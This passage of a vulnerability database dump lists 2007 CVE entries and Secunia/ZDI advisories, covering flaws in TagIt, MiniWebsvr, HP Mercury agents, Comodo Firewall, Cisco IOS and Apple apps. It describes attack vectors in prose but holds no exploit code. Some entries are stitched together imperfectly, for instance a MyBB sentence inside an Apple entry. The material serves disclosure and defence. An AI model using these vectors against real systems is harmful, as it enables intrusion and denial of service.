update for 2016/04/30 (past 90 day deadline).
2016/04/14 - 14 day grace period for disclosure was granted, according to
the disclosure policy. New disclosure date was set to 2016/05/06.
2016/05/02 - Asking for status of still unreleased 'end of April' update.
2016/05/02 - Aruba confirmed availability of update on 2016/05/09 (after grace
period).
2016/05/03 - Aruba released three advisories on
http://www.arubanetworks.com/support-services/security-bulletins/
2016/05/06 - Public disclosure.
----------------------------------------------------------------------
Secunia is proud to announce the availability of the Secunia Software
Inspector.
The Secunia Software Inspector is a free service that detects insecure
versions of software that you may have installed in your system. When
insecure versions are detected, the Secunia Software Inspector also
provides thorough guidelines for updating the software to the latest
secure version from the vendor.
1) A boundary error within the management interface can be exploited
to cause a heap-based buffer overflow by sending overly long strings
as credentials.
2) An error in the guest account authentication process within the
Captive Portal can be exploited to e.g. gain access to administrative
sections without specifying a password.
https://support.arubanetworks.com
PROVIDED AND/OR DISCOVERED BY:
John Munther and Maxim Salomon, n.runs AG
ORIGINAL ADVISORY:
http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052382.html
http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052380.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200702-0361 | CVE-2007-0900 | TagIt! Tagboard In PHP Remote file inclusion vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Multiple PHP remote file inclusion vulnerabilities in TagIt! Tagboard 2.1.B Build 2 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the (1) configpath parameter to (a) tagviewer.php, (b) tag_process.php, and (c) CONFIG/errmsg.inc.php; and (d) addTagmin.php, (e) ban_watch.php, (f) delTagmin.php, (g) delTag.php, (h) editTagmin.php, (i) editTag.php, (j) manageTagmins.php, and (k) verify.php in tagmin/; the (2) adminpath parameter to (l) tagviewer.php, (m) tag_process.php, and (n) tagmin/index.php; and the (3) admin parameter to (o) readconf.php, (p) updateconf.php, (q) updatefilter.php, and (r) wordfilter.php in tagmin/; different vectors than CVE-2006-5249. TagIt! Tagboard Is register_globals When is enabled, PHP A remote file inclusion vulnerability exists. This vulnerability CVE-2006-5249 Is a different vulnerability.By a third party, within the following parameters URL Through any PHP The code may be executed. TagIt! Tagboard 2.1.B Build 2 and earlier versions have vulnerabilities. TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible
| VAR-200702-0315 | CVE-2007-0919 | Nickolas Grigoriadis Mini Web Server traversal vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Directory traversal vulnerability in Nickolas Grigoriadis Mini Web server (MiniWebsvr) 0.0.6 allows remote attackers to list the directory immediately above the web root via a ..%00 sequence in the URI. Miniwebsvr is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid in further attacks.
Note that the attacker can traverse to only one directory above the current working directory of the webserver application.
Version 0.0.6 is vulnerable to this issue; other versions may also be affected
| VAR-200702-0025 | CVE-2007-0446 | HP Mercury products vulnerable to buffer overflow |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Stack-based buffer overflow in magentproc.exe for Hewlett-Packard Mercury LoadRunner Agent 8.0 and 8.1, Performance Center Agent 8.0 and 8.1, and Monitor over Firewall 8.1 allows remote attackers to execute arbitrary code via a packet with a long server_ip_name field to TCP port 54345, which triggers the overflow in mchan.dll. Authentication is not required to exploit this vulnerability.The specific flaw exists within the process magentproc.exe that binds to TCP port 54345. When parsing packets containing an overly long 'server_ip_name' field, an exploitable stack overflow may be triggered due to an an inline strcpy() within the library mchan.dll. Multiple Mercury products are prone to a stack-based buffer-overflow vulnerability because the applications fail to bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed exploit attempts will result in a denial of service. HP Mercury is an IT management software developed by Mercury acquired by HP.
Authentication is not required to exploit this vulnerability.
-- Vendor Response:
Hewlett-Packard has issued an update to correct this vulnerability. More
details can be found at:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00854250
-- Disclosure Timeline:
2006.10.27 - Vulnerability reported to vendor
2006.11.10 - Digital Vaccine released to TippingPoint customers
2007.02.08 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by Eric DETOISIEN.
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.
----------------------------------------------------------------------
Secunia is proud to announce the availability of the Secunia Software
Inspector.
The Secunia Software Inspector is a free service that detects insecure
versions of software that you may have installed in your system. When
insecure versions are detected, the Secunia Software Inspector also
provides thorough guidelines for updating the software to the latest
secure version from the vendor.
Try it out online:
http://secunia.com/software_inspector/
----------------------------------------------------------------------
TITLE:
HP Mercury Products Long "server_ip_name" Buffer Overflow
SECUNIA ADVISORY ID:
SA24112
VERIFY ADVISORY:
http://secunia.com/advisories/24112/
CRITICAL:
Moderately critical
IMPACT:
System access
WHERE:
>From local network
SOFTWARE:
Mercury LoadRunner Agent 8.x
http://secunia.com/product/13450/
Mercury Monitor over Firewall 8.x
http://secunia.com/product/13449/
Mercury Performance Center Agent 8.x
http://secunia.com/product/13448/
DESCRIPTION:
A vulnerability has been reported in various HP Mercury products,
which can be exploited by malicious people to compromise a vulnerable
system.
The vulnerability is caused due to a boundary error within MCHAN.DLL
when parsing packets sent to MAGENTPROC.EXE on port 54345/TCP.
-- Mercury LoadRunner Agent 8.1 FP4 --
NT:
http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/c337892f322b2311
c22572670060b795?OpenDocument
AIX, HP, Solaris, Linux:
http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/6d7ce88c0d5c4b36
c225726a004a94a2?OpenDocument
-- Mercury LoadRunner Agent 8.1 SP1, FP1, FP2, FP3 --
Update to 8.1 FP4 and apply patches listed above.
-- Mercury LoadRunner Agent 8.1 GA --
NT:
http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/7cd789640e496c34
c225726700613486?OpenDocument
AIX, HP, Solaris, Linux:
http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/f2de896609dd7efb
c225726a004af033?OpenDocument
-- Mercury LoadRunner Agent 8.0 GA --
NT:
http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/fa4a48afea2f8198
c22572670061bbe7?OpenDocument
AIX, HP, Solaris, Linux:
http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/5de153e30789fa4a
c225726a004b2354?OpenDocument
-- Mercury Performance Center Agent 8.1 FP4 --
NT:
http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/ae5d9a48a163fbb4
c225726a004c7831?OpenDocument
AIX, HP, Solaris, Linux:
http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/34e894d8d8a1b941
c225726a004ff335?OpenDocument
-- Mercury Performance Center Agent 8.1 FP1, FP2, FP3 --
Update to version 8.1 FP4 and apply patches listed above.
-- Mercury Performance Center Agent 8.1 GA --
NT:
http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/0831f8b0bd9d9619
c225726a004cf7fe?OpenDocument
AIX, HP, Solaris, Linux:
http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/a7333913152e65e1
c225726a005035e4?OpenDocument
-- Mercury Performance Center Agent 8.0 GA --
Update to version 8.1 GA and apply patches listed above.
-- Mercury Monitor over Firewall 8.1 --
NT:
http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/c9b9924b3206614f
c225726a004ded7d?OpenDocument
PROVIDED AND/OR DISCOVERED BY:
Discovered by Eric Detoisien and reported via ZDI.
ORIGINAL ADVISORY:
HPSBGN02187 SSRT061280:
http://www5.itrc.hp.com/service/cki/docDisplay.do?docId=c00854250
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-07-007.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200702-0108 | CVE-2007-0709 | Comodo Firewall Pro and Comodo Personal Firewall of cmdmon.sys Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
cmdmon.sys in Comodo Firewall Pro (formerly Comodo Personal Firewall) 2.4.16.174 and earlier does not validate arguments that originate in user mode for the (1) NtCreateSection, (2) NtOpenProcess, (3) NtOpenSection, (4) NtOpenThread, and (5) NtSetValueKey hooked SSDT functions, which allows local users to cause a denial of service (system crash) and possibly gain privileges via invalid arguments. Comodo Firewall Pro is prone to a denial-of-service vulnerability. Local attackers may exploit this vulnerability to cause denial of service. The Comodo firewall hooks many functions in SSDT, and there are at least 7 cases where there are no parameters for verifying user mode. Due to a bug in the cmdmon.sys driver, a denial of service may result when calling NtConnectPort, NtCreatePort, NtCreateSection, NtOpenProcess, NtOpenSection, NtOpenThread, and NtSetValueKey
| VAR-200702-0091 | CVE-2007-0686 | w29n51.sys Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
The Intel 2200BG 802.11 Wireless Mini-PCI driver 9.0.3.9 (w29n51.sys) allows remote attackers to cause a denial of service (system crash) via crafted disassociation packets, which triggers memory corruption of "internal kernel structures," a different vulnerability than CVE-2006-6651. NOTE: this issue might overlap CVE-2006-3992. Intel 2200BG 802.11 Wireless Mini-PCI driver (w29n51.sys) There is a service disruption ( System crash ) There is a vulnerability that becomes a condition. This vulnerability CVE-2006-6651 Is a different vulnerability
| VAR-200702-0071 | CVE-2007-0666 | Ipswitch WS_FTP Server Vulnerable to arbitrary code execution on the system |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Ipswitch WS_FTP Server 5.04 allows FTP site administrators to execute arbitrary code on the system via a long input string to the (1) iFTPAddU or (2) iFTPAddH file, or to a (3) edition module
| VAR-200702-0107 | CVE-2007-0708 | Comodo Firewall Pro of cmdmon.sys Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
cmdmon.sys in Comodo Firewall Pro (formerly Comodo Personal Firewall) before 2.4.16.174 does not validate arguments that originate in user mode for the (1) NtConnectPort and (2) NtCreatePort hooked SSDT functions, which allows local users to cause a denial of service (system crash) and possibly gain privileges via invalid arguments. Comodo Firewall is prone to multiple denial-of-service vulnerabilities because it fails to adequately validate user supplied data.
Exploiting these issues may permit attackers to cause system crashes and deny service to legitimate users. Presumaby, attackers may also be able to execute arbitrary code, but this has not been confirmed.
Comodo Firewall Pro 2.4.16.174 and Comodo Personal Firewall 2.3.6.81 are vulnerable; other versions may also be affected. The Comodo firewall hooks many functions in SSDT, and there are at least 7 cases where there are no parameters for verifying user mode. Due to a bug in the cmdmon.sys driver, a denial of service may result when calling NtConnectPort, NtCreatePort, NtCreateSection, NtOpenProcess, NtOpenSection, NtOpenThread, and NtSetValueKey
| VAR-200702-0384 | CVE-2007-0648 | Cisco IOS fails to properly handle Session Initiated Protocol packets |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco IOS after 12.3(14)T, 12.3(8)YC1, 12.3(8)YG, and 12.4, with voice support and without Session Initiated Protocol (SIP) configured, allows remote attackers to cause a denial of service (crash) by sending a crafted packet to port 5060/UDP. Exploitation of this vulnerability may result in a denial-of-service condition. According to Cisco Systems' information, it is not necessary for the specific affected version. SIP port (5060/TCP,UDP) Is reported to be open by default.Crafted by a third party SIP By processing the packet, SIP Service works Cisco IOS Device is out of service (DoS) It may be in a state.
This issue affects only devices that support voice communications but don't have SIP enabled.
Attackers can exploit this issue to reload a vulnerable device.
IOS releases subsequent to 12.3(14)T, 12.3(8)YC1, and 12.3(8)YG are vulnerable. All 12.4 releases are affected as well. In addition, some IOS versions that support SIP services may process SIP messages even if no SIP operations are configured. If you want to process SIP messages, IOS needs to open UDP port 5060 and TCP port 5060 for listening. Devices not listening on TCP 5060 or UDP 5060 are not affected by the vulnerability. Since SIP uses UDP for transport, it is possible to spoof the IP address of the sender, which can invalidate ACLs that allow traffic from trusted IP addresses to those ports
| VAR-200702-0128 | CVE-2007-0661 | Intel Enterprise Southbridge Baseboard Management Controller In IPMI Command issue vulnerability |
CVSS V2: 5.4 CVSS V3: - Severity: MEDIUM |
Intel Enterprise Southbridge 2 Baseboard Management Controller (BMC), Intel Server Boards 5000XAL, S5000PAL, S5000PSL, S5000XVN, S5000VCL, S5000VSA, SC5400RA, and OEM Firmware for Intel Enterprise Southbridge Baseboard Management Controller before 20070119, when Intelligent Platform Management Interface (IPMI) is enabled, allow remote attackers to connect and issue arbitrary IPMI commands, possibly triggering a denial of service. By issuing commands to this interface, attackers can trigger denial-of-service conditions, but they cannot gain access to the operating system or data contained in affected computers.
Firmware versions prior to release 57 are vulnerable to this issue. Intel Southbridge 2 is the Southbridge used on many Intel server motherboards. But successful exploitation of this vulnerability can only result in a denial of service
| VAR-200702-0383 | CVE-2007-0647 | Help Viewer Format string vulnerability |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
Format string vulnerability in Help Viewer 3.0.0 allows remote user-assisted attackers to cause a denial of service (crash) via format string specifiers in a filename, which is not properly handled when calling the NSBeginAlertSheet Apple AppKit function. Multiple products for Mac OS X are prone to multiple remote format-string vulnerabilities. The affected applications include Help Viewer, Safari, iPhoto, and iMovie.
Exploiting these issues can allow attacker-supplied data to be written to arbitrary memory locations, which can facilitate the execution of arbitrary machine code with the privileges of a targeted application. Failed exploit attempts will likely crash the application.
Help Viewer 3.0.0, Safari 2.0.4, iMovie HD 6.0.3, and iPhoto 6.0.5 are reported affected; other versions may be vulnerable as well. A format string vulnerability exists in MyBB (aka MyBulletinBoard) version 1.2.2
| VAR-200702-0381 | CVE-2007-0645 | iPhoto Format string vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Format string vulnerability in iPhoto 6.0.5 allows remote user-assisted attackers to cause a denial of service (crash) via format string specifiers in a filename, which is not properly handled when calling certain Apple AppKit functions. Multiple products for Mac OS X are prone to multiple remote format-string vulnerabilities. The affected applications include Help Viewer, Safari, iPhoto, and iMovie.
Exploiting these issues can allow attacker-supplied data to be written to arbitrary memory locations, which can facilitate the execution of arbitrary machine code with the privileges of a targeted application. Failed exploit attempts will likely crash the application.
Help Viewer 3.0.0, Safari 2.0.4, iMovie HD 6.0.3, and iPhoto 6.0.5 are reported affected; other versions may be vulnerable as well. A format string vulnerability exists in iPhoto version 6.0.5
| VAR-200702-0380 | CVE-2007-0644 | Apple Safari Format string vulnerability |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
Format string vulnerability in Apple Safari 2.0.4 (419.3) allows remote user-assisted attackers to cause a denial of service (crash) via format string specifiers in filenames that are not properly handled when calling the (1) NSLog and (2) NSBeginAlertSheet Apple AppKit functions. Multiple products for Mac OS X are prone to multiple remote format-string vulnerabilities. The affected applications include Help Viewer, Safari, iPhoto, and iMovie.
Exploiting these issues can allow attacker-supplied data to be written to arbitrary memory locations, which can facilitate the execution of arbitrary machine code with the privileges of a targeted application. Failed exploit attempts will likely crash the application.
Help Viewer 3.0.0, Safari 2.0.4, iMovie HD 6.0.3, and iPhoto 6.0.5 are reported affected; other versions may be vulnerable as well